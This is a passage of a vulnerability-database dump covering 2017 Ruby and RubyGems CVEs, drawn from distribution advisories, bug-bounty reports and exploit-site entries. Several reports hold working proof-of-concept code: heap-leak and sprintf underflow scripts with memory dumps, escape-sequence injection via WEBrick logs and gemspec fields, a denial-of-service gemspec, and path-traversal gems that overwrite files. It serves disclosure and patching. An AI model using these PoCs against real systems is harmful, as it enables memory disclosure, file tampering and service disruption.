Psych.safe_load\n * ruby-2.1.0-there-should-be-only-one-exception.patch\n * ruby-2.1.0-Adding-Psych.safe_load.patch\n Related: CVE-2017-0903\n- Disable Tokyo TZ tests broken by recen tzdata update.\n * ruby-2.5.0-Disable-Tokyo-TZ-tests.patch\n Related: CVE-2017-0903\n[2.0.0.648-31]\n- Fix unsafe object deserialization in RubyGems (CVE-2017-0903).\n * ruby-2.4.3-CVE-2017-0903-Fix-unsafe-object-deserialization\n -vulnerability.patch\n Resolves: CVE-2017-0903\n- Fix an ANSI escape sequence vulnerability (CVE-2017-0899).\n Resolves: CVE-2017-0899\n- Fix a DOS vulernerability in the query command (CVE-2017-0900).\n Resolves: CVE-2017-0900\n- Fix a vulnerability in the gem installer that allowed a malicious gem\n to overwrite arbitrary files (CVE-2017-0901).\n Resolves: CVE-2017-0901\n- Fix a DNS request hijacking vulnerability (CVE-2017-0902).\n * ruby-2.2.8-lib-rubygems-fix-several-vulnerabilities-in-RubyGems.patch\n Resolves: CVE-2017-0902\n- Fix buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898).\n * ruby-2.2.8-Buffer-underrun-vulnerability-in-Kernel.sprintf.patch\n Resolves: CVE-2017-0898\n- Escape sequence injection vulnerability in the Basic\n authentication of WEBrick (CVE-2017-10784).\n * ruby-2.2.8-sanitize-any-type-of-logs.patch\n Resolves: CVE-2017-10784\n- Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064).\n * ruby-2.2.8-Fix-arbitrary-heap-exposure-during-a-JSON.generate-call.patch\n Resolves: CVE-2017-14064\n- Command injection vulnerability in Net::FTP (CVE-2017-17405).\n * ruby-2.2.9-Fix-a-command-injection-vulnerability-in-Net-FTP.patch\n Resolves: CVE-2017-17405\n- Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033).\n * ruby-2.2.8-asn1-fix-out-of-bounds-read-in-decoding-constructed-objects.patch\n Resolves: CVE-2017-14033\n- Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code\n execution(CVE-2017-17790).\n * ruby-2.5.0-Fixed-command-Injection.patch\n Resolves: CVE-2017-17790", "edition": 5, 
"modified": "2018-02-28T00:00:00", "published": "2018-02-28T00:00:00", "id": "ELSA-2018-0378", "href": "http://linux.oracle.com/errata/ELSA-2018-0378.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-10-18T08:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2016-2337", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\u201cWEBRick\u201d) and a class for XML parsing (\u201cREXML\u201d). \n\n### Description\n\nMultiple vulnerabilities have been discovered in Ruby. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ruby users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-2.2.8\"", "edition": 1, "modified": "2017-10-18T00:00:00", "published": "2017-10-18T00:00:00", "href": "https://security.gentoo.org/glsa/201710-18", "id": "GLSA-201710-18", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-08T16:16:38", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-0901"], "description": "### Background\n\nRubyGems is a sophisticated package manager for Ruby.\n\n### Description\n\nMultiple vulnerabilities have been discovered in RubyGems. Please review the referenced CVE identifiers for details. 
\n\n### Impact\n\nA remote attacker, by enticing a user to install a specially crafted gem, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll RubyGems users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-ruby/rubygems-2.6.13\"", "edition": 1, "modified": "2017-10-08T00:00:00", "published": "2017-10-08T00:00:00", "href": "https://security.gentoo.org/glsa/201710-01", "id": "GLSA-201710-01", "title": "RubyGems: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2017-12-26T16:32:32", "published": "2017-12-26T16:32:32", "id": "FEDORA:E680D6015E29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: ruby-2.4.2-84.fc26", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. 
", "modified": "2017-10-02T14:27:35", "published": "2017-10-02T14:27:35", "id": "FEDORA:605EC60A618F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: ruby-2.4.2-84.fc27", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-14064"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2017-09-16T03:24:34", "published": "2017-09-16T03:24:34", "id": "FEDORA:EB90F61CDEB4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: ruby-2.3.4-64.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902"], "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "modified": "2017-09-09T23:57:10", "published": "2017-09-09T23:57:10", "id": "FEDORA:2FE52602F595", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: rubygems-2.6.13-100.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902"], "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. 
", "modified": "2017-09-30T07:26:40", "published": "2017-09-30T07:26:40", "id": "FEDORA:16FA760E0F1F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: rubygems-2.6.13-100.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-14064"], "description": "Running this snippet can expose arbitrary memory:\n```ruby\nrequire 'json'\n\nstate = JSON.state.new\nstate.space = \"\\0\" * 1024\n\nputs JSON.generate({a: :b}, state)\n```\n\n```\n{\"a\":\npsych/handlers/recorder.rb\ntensi0\nreeze)\nGem::Specification.new do |s|\n # to objects of the same type as the original delegate.\nmydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb\npass the namP\nSee http://guides.rubygems.org/specification-reference/ for help\n# # constant and class member data initialization...\n\"b\"}\n```\n\n\nThe issues lies in using `strdup` in [generator.c](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L1103), which will stop after encountering a NULL byte returning a pointer to zero length string, which is not the length stored in `space_len`. Eventually `fbuffer_append` will copy the length of the string (e.g. 
the 1024 above) into the generated buffer.\n\nSimpler snippets like `JSON.generate({foo: \"bar\"}, space: \"\\0\" * 1024` suffer the same issue but for slightly different reason; as `fstrndup` is using [memccpy](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L311) which will, again, stop copying after encountering a NULL byte returning a pointer to zero length string.", "modified": "2017-09-25T12:32:43", "published": "2017-03-01T22:55:39", "id": "H1:209949", "href": "https://hackerone.com/reports/209949", "type": "hackerone", "title": "Ruby: Arbitrary heap exposure in JSON.generate", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-10784"], "description": "WEBrick BasicAuth outputs any non-existing user name to logs without sanitizing. By exploting this, an attacker can inject malicious escape sequences to its logs. This issue is exactly the same as [the old already-fixed vulnerability](https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/).\n\nHow to reproduce:\n\n1) Run this WEBrick server program in a terminal.\n\n~~~~\nrequire \"webrick\"\nrequire \"webrick/httpauth\"\n\nsrv = WEBrick::HTTPServer.new({ Port: 34567 })\ndb = WEBrick::HTTPAuth::Htpasswd.new(\"dot.htpasswd\")\nauthenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: \"realm\")\nsrv.mount_proc(\"/\") do |req, res|\n authenticator.authenticate(req, res)\n res.body = \"foobar\"\nend\nsrv.start\n~~~~\n\n2) Run this attack access program in another terminal.\n\n~~~~\nrequire \"open-uri\"\n\nopen(\"http://localhost:34567/login\",\n http_basic_authentication: [\n \"ESCAPE SEQUENCE HERE->\\e]2;BOOM!\\a<-SEE WINDOW TITLE\",\n \"passwd\"\n]).read\n~~~~\n\n3) See the first terminal that runs the server. 
You will see a line like this, and its window title changed \"BOOM!\".\n\n~~~~\n[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-><-SEE WINDOW TITLE: the user is not allowed.\n~~~~\n\nNote: I'm a member of the ruby-core team, but I'm not involved with development of WEBrick. I did not create the bug, of course. I will happily accept any bounty if any :-)", "modified": "2017-09-15T05:29:39", "published": "2017-04-24T10:25:41", "id": "H1:223363", "href": "https://hackerone.com/reports/223363", "type": "hackerone", "title": "Ruby: Escape sequence injection vulnerability in WEBrick BasicAuth", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-0899"], "description": "Seems we can include any escape sequence in the \"summary\" field of gemspec. This allows attackers to inject escape sequences to a victim's terminal emulator.\n\n## How to attack\n\n1) An attacker creates a gem with summary string that includes malicious escape sequences, and push it to rubygems.org.\n2) A victim executes `gem search attackers-gem -d`, and the malicious string is printed in the terminal emulator.\n\nIn general, this is considered vulnerable. I'd like you to read [Terminal Emulator Security Issues](http://marc.info/?l=bugtraq&m=104612710031920&w=2) in detail. In short, an attacker can exploit this, not only to surprise a victim with a rainbow string, but also to inject malicious command to a victim's terminal, which may lead to abitrary code execution. 
Ruby WEBrick also handled a similar issue as [a vulnerability](https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/).\n\n\n## Proof of concept\n\n1) Prepare the following gemspec.\n\n~~~\nGem::Specification.new do |spec|\n spec.name = \"escape-sequence-injection-vulnerability\"\n spec.version = \"0.0.1\"\n spec.authors = [\"Yusuke Endoh\"]\n spec.email = [\"mame@ruby-lang.org\"]\n spec.summary = \"foo\\e[31mbar\\e[0mbaz \\e]2;BOOM!\\a\"\n spec.homepage = \"http://example.com/\"\n spec.license = \"MIT\"\nend\n~~~\n\n2) Run the following commands\n\n~~~\ngem build escape-sequence-injection-vulnerability.gemspec\ngem install escape-sequence-injection-vulnerability-0.0.1.gem\n~~~\n\n3) Run the following command.\n\n~~~\ngem query escape-sequence-injection-vulnerability -d && sleep 10\n~~~\n\nYou will see a summary line \"foobarbaz\" (with \"bar\" red), and its window title changed \"BOOM!\".", "modified": "2017-08-30T23:20:55", "published": "2017-05-05T13:35:48", "id": "H1:226335", "href": "https://hackerone.com/reports/226335", "type": "hackerone", "title": "RubyGems: Escape sequence injection in \"summary\" field", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2017-0898"], "description": "In a ticket that was also reported to \"shopify-scripts\" regarding \"MRuby\", I reported in details a combined attack against the sprintf gem:\n* Information leak\n* Heap buffer underflow\n\nThe full ticket details can be found in:\n* Ticket #212239\n* The ticked was opened several minutes ago (but I add it in case it will be handled fast enough to be available to you too), and here are the details:\n\nThis ticket is somehow connected to Ticket #211190, that suggested another fix to the ```CHECK(l)``` macro. 
The attached code assumed that the ticket will be fixed like it was fixed in MRuby, however the vulnerabilities apply even without the fix, that was aimed at another vulnerability.\n\nTechnical Error 1:\n==============\nThe ```CHECK(l)``` macro can sometimes receive negative values, that will bypass the size checks, since the resize loop is:\n```cpp\n#define CHECK(l) do {\\\n/* int cr = ENC_CODERANGE(result);*/\\\n while ((l) >= bsiz - blen) {\\\n bsiz*=2;\\\n }\\\n mrb_str_resize(mrb, result, bsiz);\\\n/* ENC_CODERANGE_SET(result, cr);*/\\\n buf = RSTRING_PTR(result);\\\n} while (0)\n```\nOne example for reaching a negative \"l\" value is in the \"G\" format when the width is \"2 ** 31 - 20\", causing need to be ```MIN_INT```:\n```cpp\n if ((flags&FWIDTH) && need < width)\n need = width;\n need += 20;\n\n CHECK(need);\n n = snprintf(&buf[blen], need, fbuf, fval);\n blen += n;\n```\nProposed Fix:\n--------------------\nSince there are several such IOFs, the best fix will be a robust check inside the macro itself.\nThe macro should add another check to raise an exception in case ```l < 0```.\n\nTechnical Error 2:\n==============\nStill in the \"G\" format, in case of a huge width, the snprintf call will fail, returning -1:\n```cpp\n n = snprintf(&buf[blen], need, fbuf, fval);\n blen += n;\n```\nThis means that we can decrement blen by 1 for each such format primitive.\nInformation Leak PoC Script:\n```ruby\nsecret_password = \"thisismysuperdupersecretpassword\"\n\nf = 1234567890.12345678\nunique = sprintf(\"% 2147483628G\", f)\n\nsample1 = \"1\" * 50\nsample2 = \"2\" * 100\nsample3 = \"3\" * 200\n\nprint unique.length\nprint unique\n```\nOn 32bit machines, the ```mrb_str_resize(-1)``` will create a string of length -1 with a data buffer realloced with size 0 (= -1 + 1). 
The resulting output is:\n```\nhexdump sprintf_leak.bin\n0000000 312d 0000 0000 0000 0000 0000 0000 0000\n0000010 0000 0000 0000 0000 0000 0000 0000 0000\n*\n0000080 0000 0000 0000 0039 0000 3131 3131 3131\n0000090 3131 3131 3131 3131 3131 3131 3131 3131\n*\n00000b0 3131 3131 3131 3131 3131 3131 0000 0071\n00000c0 0000 3232 3232 3232 3232 3232 3232 3232\n00000d0 3232 3232 3232 3232 3232 3232 3232 3232\n*\n0000120 3232 3232 3232 0000 0000 0000 0000 00d1\n0000130 0000 3333 3333 3333 3333 3333 3333 3333\n0000140 3333 3333 3333 3333 3333 3333 3333 3333\n*\n00001f0 3333 3333 3333 3333 3333 0000 0000 05c9\n0000200 0000 ca20 b76f ca20 b76f ebd8 095d ebd8\n0000210 095d 0000 0000 0000 0000 0000 0000 0000\n0000220 0000 0000 0000 0000 0000 0000 0000 0000\n*\n00007c0 0000 05c8 0000 0010 0000 001b 0000 0001\n00007d0 0000 e048 095d 0029 0000 6874 7369 7369\n00007e0 796d 7573 6570 6472 7075 7265 6573 7263\n00007f0 7465 6170 7373 6f77 6472 0000 0000 0021\n0000800 0000 0810 0000 e2c0 0959 0000 0000 0020\n0000810 0000 e0f0 095d f200 095d 0000 0000 0029\n0000820 0000 6874 7369 7369 796d 7573 6570 6472\n0000830 7075 7265 6573 7263 7465 6170 7373 6f77\n0000840 6472 0000 0000 0019 0000 2025 3132 3734\n0000850 3834 3633 3832 0047 0000 0000 0000 0021\n0000860 0000 0810 0000 e2c0 0959 0000 0000 000d\n0000870 0000 e108 095d f260 095d 0000 0000 0019\n0000880 0000 2025 3132 3734 3834 3633 3832 0047\n0000890 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008a0 0959 0000 0000 0031 0000 0000 0000 0000\n00008b0 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008c0 0959 0000 0000 0032 0000 0000 0000 0000\n00008d0 0000 0000 0000 0021 0000 8010 0001 e2c0\n00008e0 0959 0000 0000 0033 0000 0000 0000 0000\n00008f0 0000 0000 0000 dd31 0001 0000 0000 0000\n0000900 0000 0000 0000 0000 0000 0000 0000 0000\n*\n0001000\n```\nAnd a close look will tell us that:\n* The print of unique.length returned -1: 0x2d, 0x31\n* Our \"secret password\" can be found at the last memory block of the dump.\n\nHeap buffer underflow 
PoC Script:\n--------------------------------------------------\n```ruby\nf = 1234567890.12345678\nformat = \"% 2147483628G\" * 10 + \"!!!!!!!!!!!\"\n\nstr1 = \"1\" * 120\nunique = sprintf(format, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f, f)\nprint str1\n```\nDecrementing ```blen``` 10 times, will result in a buffer underflow of 10 bytes, that will write '!' on the str1, as can be seen in the dump:\n```\n*** Error in `./mruby': double free or corruption (out): 0x09905b30 ***\n======= Backtrace: =========\n/lib/i386-linux-gnu/libc.so.6(+0x67257)[0xb7530257]\n/lib/i386-linux-gnu/libc.so.6(+0x6d577)[0xb7536577]\n/lib/i386-linux-gnu/libc.so.6(+0x6dd31)[0xb7536d31]\n./mruby[0x804c81b]\n./mruby[0x80593f5]\n./mruby[0x8052760]\n./mruby[0x805a3a0]\n./mruby[0x80596bb]\n./mruby[0x80596f8]\n./mruby[0x804ce4d]\n./mruby[0x8049762]\n./mruby[0x8049c48]\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb74e1637]\n./mruby[0x80491d1]\n======= Memory map: ========\n08048000-080ed000 r-xp 00000000 08:01 2883651 /XXX/mruby/bin/mruby\n080ed000-080ee000 r--p 000a4000 08:01 2883651 /XXX/mruby/bin/mruby\n080ee000-080ef000 rw-p 000a5000 08:01 2883651 /XXX/mruby/bin/mruby\n098c0000-09924000 rw-p 00000000 00:00 0 [heap]\nb7300000-b7321000 rw-p 00000000 00:00 0 \nb7321000-b7400000 ---p 00000000 00:00 0 \nb7495000-b74b1000 r-xp 00000000 08:01 656726 /lib/i386-linux-gnu/libgcc_s.so.1\nb74b1000-b74b2000 rw-p 0001b000 08:01 656726 /lib/i386-linux-gnu/libgcc_s.so.1\nb74c8000-b74c9000 rw-p 00000000 00:00 0 \nb74c9000-b7678000 r-xp 00000000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb7678000-b7679000 ---p 001af000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb7679000-b767b000 r--p 001af000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb767b000-b767c000 rw-p 001b1000 08:01 656688 /lib/i386-linux-gnu/libc-2.23.so\nb767c000-b767f000 rw-p 00000000 00:00 0 \nb767f000-b76d2000 r-xp 00000000 08:01 656758 /lib/i386-linux-gnu/libm-2.23.so\nb76d2000-b76d3000 r--p 00052000 08:01 
656758 /lib/i386-linux-gnu/libm-2.23.so\nb76d3000-b76d4000 rw-p 00053000 08:01 656758 /lib/i386-linux-gnu/libm-2.23.so\nb76e9000-b76ec000 rw-p 00000000 00:00 0 \nb76ec000-b76ee000 r--p 00000000 00:00 0 [vvar]\nb76ee000-b76ef000 r-xp 00000000 00:00 0 [vdso]\nb76ef000-b7711000 r-xp 00000000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nb7711000-b7712000 rw-p 00000000 00:00 0 \nb7712000-b7713000 r--p 00022000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nb7713000-b7714000 rw-p 00023000 08:01 656660 /lib/i386-linux-gnu/ld-2.23.so\nbff43000-bff64000 rw-p 00000000 00:00 0 [stack]\n1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!!Aborted (core dumped)\n```\nProposed Fix:\n--------------------\nShould check the return value of ```snprintf ``` for errors, instead of directly using it by adding it to ```blen```.", "modified": "2017-09-22T00:05:00", "published": "2017-03-10T11:48:41", "id": "H1:212241", "href": "https://hackerone.com/reports/212241", "type": "hackerone", "title": "Ruby: sprintf combined format string attack", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-0900"], "description": "Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make `gem search` unavailable.\n\nThis is not Arbitrary Code Execution, but really easy to attack. 
According to CVSS v3.0 Calculator, the severity is High (7.5).\n\n## How to attack\n\n1) An attacker creates a gem with huge summary string, and push it to rubygems.org.\n2) A victim runs `gem search -d <substring-of-the-name-of-the-gem>`, but it will give no response.\n\nIt may be good for the gem name to include a frequently-searched keyword, such as \"foo-rails-bar\" or \"foo-sinatra-bar\".\n\n## Proof of concept\n\n1) Prepare the following gemspec.\n\n~~~~\nGem::Specification.new do |spec|\n spec.name = \"huge-summary\"\n spec.version = \"0.0.1\"\n spec.authors = [\"Yusuke Endoh\"]\n spec.email = [\"mame@ruby-lang.org\"]\n spec.summary = \"foo\" * 10000000\n spec.homepage = \"http://example.com/\"\n spec.license = \"MIT\"\nend\n~~~~\n\n2) Run the following commands\n\n~~~~\ngem build huge-summary.gemspec\ngem install huge-summary-0.0.1.gem\n~~~~\n\n3) Run the following command.\n\n~~~~\ngem query huge-summary -d\n~~~~\n\nIt will not answer.", "modified": "2017-08-31T23:19:29", "published": "2017-06-25T07:53:33", "id": "H1:243003", "href": "https://hackerone.com/reports/243003", "type": "hackerone", "title": "RubyGems: No limit of summary length allows Denail of Service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:14", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2017-0901"], "description": "There is no check for `name` field in `metadata.gz`. 
By assigning a maliciously crafted string like `../../../../../any/where` to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\n\n## Proof of Concept 1: Create a file anywhere\n\nThis PoC attempts to create a file `/tmp/malicious-0/BOOOOM`.\n\n1) Download the attached file `malicious.gem`.\n2) Run `gem install malicious.gem --no-doc`.\n3) `/tmp/malicious-0/BOOOOM` should be created.\n\n`malicious.gem` assigns `../../../../../../../../../../tmp/malicious` as `name` field. This attack is relatively weak since the path must include a directory named `<name>-<version>`, such as `malicious-0`. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in `/etc/dbus-1/`.\n\n## Proof of Concept 2: Replace `rackup` command\n\nThis PoC attempts to replace `gems/rack-2.0.3/bin/rackup` with a malicious file.\n\n1) Download the attached file `replace-rackup.gem`.\n2) Run `gem install rack -v 2.0.3`.\n3) Run `gem install replace-rackup.gem --no-doc`.\n4) Run `rackup`. It will emit just `BOOOOM!`.\n\n`replace-rackup.gem` assigns `../gems/rack` as `name` field, and contains a malicious file `bin/rackup`. This is really exploitable for attackers.\n\n## Note\n\nFor how to create the malicious gems, see the attached file `src.tar.gz`.\n\nIn my opinion, **this attack is much more dangerous** than the issues I reported recently. 
I hope you could fix this issue ASAP.", "modified": "2017-08-31T23:18:39", "published": "2017-06-26T09:14:48", "id": "H1:243156", "href": "https://hackerone.com/reports/243156", "type": "hackerone", "title": "RubyGems: Installing a crafted gem package may create or overwrite files", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-09T01:46:31", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-09-04T00:00:00", "type": "zdt", "title": "RubyGems < 2.6.13 - Arbitrary File Overwrite Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0901"], "modified": "2017-09-04T00:00:00", "href": "https://0day.today/exploit/description/28426", "id": "1337DAY-ID-28426", "sourceData": "There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\r\n \r\nProof of Concept 1: Create a file anywhere\r\n \r\nThis PoC attempts to create a file /tmp/malicious-0/BOOOOM.\r\n \r\n1) Download the attached file malicious.gem.\r\n2) Run gem install malicious.gem --no-doc.\r\n3) /tmp/malicious-0/BOOOOM should be created.\r\n \r\nmalicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.\r\n \r\nProof of Concept 2: Replace rackup command\r\n \r\nThis PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.\r\n \r\n1) Download the attached file replace-rackup.gem.\r\n2) Run gem install rack -v 2.0.3.\r\n3) Run gem install replace-rackup.gem --no-doc.\r\n4) Run rackup. 
It will emit just BOOOOM!.\r\n \r\nreplace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.\r\n \r\nNote\r\n \r\nFor how to create the malicious gems, see the attached file src.tar.gz.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28426", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-09-04T19:13:04", "description": "RubyGems < 2.6.13 - Arbitrary File Overwrite. CVE-2017-0901. Local exploit for Linux platform", "published": "2017-09-04T00:00:00", "type": "exploitdb", "title": "RubyGems < 2.6.13 - Arbitrary File Overwrite", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0901"], "modified": "2017-09-04T00:00:00", "id": "EDB-ID:42611", "href": "https://www.exploit-db.com/exploits/42611/", "sourceData": "There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.\r\n\r\nProof of Concept 1: Create a file anywhere\r\n\r\nThis PoC attempts to create a file /tmp/malicious-0/BOOOOM.\r\n\r\n1) Download the attached file malicious.gem.\r\n2) Run gem install malicious.gem --no-doc.\r\n3) /tmp/malicious-0/BOOOOM should be created.\r\n\r\nmalicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. 
For example, think of replacing a file in /etc/dbus-1/.\r\n\r\nProof of Concept 2: Replace rackup command\r\n\r\nThis PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.\r\n\r\n1) Download the attached file replace-rackup.gem.\r\n2) Run gem install rack -v 2.0.3.\r\n3) Run gem install replace-rackup.gem --no-doc.\r\n4) Run rackup. It will emit just BOOOOM!.\r\n\r\nreplace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.\r\n\r\nNote\r\n\r\nFor how to create the malicious gems, see the attached file src.tar.gz.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42611/"}], "apple": [{"lastseen": "2020-12-24T20:44:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-0898", "CVE-2017-17405", "CVE-2018-4288", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-4286", "CVE-2018-4287", "CVE-2018-6913", "CVE-2018-4276", "CVE-2018-4259", "CVE-2017-14033", "CVE-2018-6797", "CVE-2018-4283", "CVE-2018-4285", "CVE-2018-4277", "CVE-2018-4248", "CVE-2018-3665", "CVE-2018-4269", "CVE-2018-4289", "CVE-2018-8777", "CVE-2018-4268", "CVE-2018-4274", "CVE-2018-4293", "CVE-2017-14064", "CVE-2018-4470", "CVE-2018-4280", "CVE-2018-5383", "CVE-2018-4456", "CVE-2018-8779", "CVE-2018-4178", "CVE-2018-4291", "CVE-2018-6914"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
